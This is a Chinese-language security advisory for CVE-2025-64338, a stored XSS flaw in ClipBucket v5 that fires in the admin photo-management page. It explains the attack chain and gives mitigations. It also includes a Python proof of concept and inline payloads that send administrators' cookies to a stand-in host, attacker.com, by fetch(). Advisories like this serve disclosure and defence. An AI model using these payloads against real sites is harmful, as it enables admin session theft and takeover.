CVE-2025-64338 ClipBucket v5存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64338

漏洞类型

存储型XSS

CVSS评分

9.0 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

ClipBucket v5

漏洞概述

CVE-2025-64338是ClipBucket v5视频分享平台中存在的一个高危存储型跨站脚本（Stored XSS）漏洞。该漏洞影响ClipBucket v5.5.2版本至#156及以下所有版本。攻击者作为经过认证的低权限普通用户，可以创建一个照片集合（Photo Collection），并在集合名称中注入恶意的HTML或JavaScript代码。由于ClipBucket的"管理照片"（Manage Photos）功能未对用户输入进行充分的输出编码和过滤，攻击者注入的恶意脚本会被永久存储在系统中。当管理员访问"Admin → Manage Photos"管理界面时，这些存储的恶意代码会被不安全地渲染执行，从而在管理员的浏览器中自动运行。攻击者可以利用此漏洞劫持管理员会话、窃取敏感信息、修改系统配置或执行其他具有高权限的操作。由于该漏洞需要管理员交互才能触发完整攻击链，因此CVSS评分中的用户交互指标被标记为"需要交互"（UI:R）。该漏洞已于5.5.2-#157版本中修复，ClipBucket官方建议所有用户尽快升级到最新版本以消除安全风险。

技术细节

该漏洞的根本原因在于ClipBucket v5应用层面对用户输入的输出编码机制不完善。攻击者通过以下步骤利用此漏洞：首先，攻击者使用低权限账号登录ClipBucket平台；然后导航至创建照片集合的功能模块；接着在"Collection Name"字段中注入精心构造的XSS payload，例如：<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>等；提交后，该payload被存储在数据库中且未进行任何安全过滤。当管理员访问"Admin → Manage Photos"管理界面并查看照片列表时，应用程序从数据库中检索并直接输出集合名称到HTML页面中。由于缺少适当的输出编码（如HTML实体转义），浏览器将payload作为有效代码执行。攻击者可以利用此执行环境执行任意JavaScript代码，包括但不限于：窃取管理员Cookie/Session令牌、修改管理员账户密码、添加新的管理员账户、上传恶意文件、修改系统配置或在内网环境中进行进一步渗透攻击。该漏洞的成功利用完全依赖于管理员访问受污染的管理界面，体现了存储型XSS漏洞的持久性和危害性。

攻击链分析

STEP 1

步骤1

攻击者获取ClipBucket平台低权限账户并完成登录认证

STEP 2

步骤2

攻击者访问照片集合创建功能模块

STEP 3

步骤3

攻击者在"Collection Name"字段中注入恶意XSS payload，如<script>标签或事件处理器

STEP 4

步骤4

提交创建请求，payload被存储到数据库中，系统未进行适当的输入验证或输出编码

STEP 5

步骤5

管理员登录后台访问"Admin → Manage Photos"管理界面

STEP 6

步骤6

应用程序从数据库读取包含恶意代码的集合名称，直接输出到HTML页面

STEP 7

步骤7

浏览器将存储的payload作为有效JavaScript代码执行，攻击者成功窃取管理员Cookie或执行特权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-64338 PoC - ClipBucket v5 Stored XSS
# Target: ClipBucket v5.5.2 <= #156
# Attack: Authenticated user creates photo collection with XSS payload in name

TARGET_URL = "http://target-website.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# XSS Payload - Steal admin cookies
XSS_PAYLOAD = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"

def login(session):
    """Login as regular user with low privileges"""
    login_url = f"{TARGET_URL}/login.php"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(login_url, data=data)
    return "logout" in response.text or response.status_code == 200

def create_photo_collection(session):
    """Create photo collection with XSS payload in name"""
    create_url = f"{TARGET_URL}/actions/collections/create_collection.php"
    data = {
        "collection_name": XSS_PAYLOAD,
        "collection_type": "photos"
    }
    response = session.post(create_url, data=data)
    return response.status_code == 200

def main():
    session = requests.Session()
    
    print("[*] Step 1: Logging in as low-privilege user...")
    if not login(session):
        print("[-] Login failed!")
        return
    print("[+] Login successful!")
    
    print("[*] Step 2: Creating photo collection with XSS payload...")
    if not create_photo_collection(session):
        print("[-] Collection creation failed!")
        return
    print("[+] Photo collection created with XSS payload!")
    print("[*] Payload will execute when admin visits Manage Photos page")

if __name__ == "__main__":
    main()

影响范围

ClipBucket v5 <= 5.5.2-#156

防御指南

临时缓解措施

在官方补丁发布前，建议限制低权限用户创建照片集合的功能权限，对管理员账户启用双因素认证以降低账户被盗风险，同时在Web应用层部署WAF规则检测和拦截恶意XSS payload的注入尝试。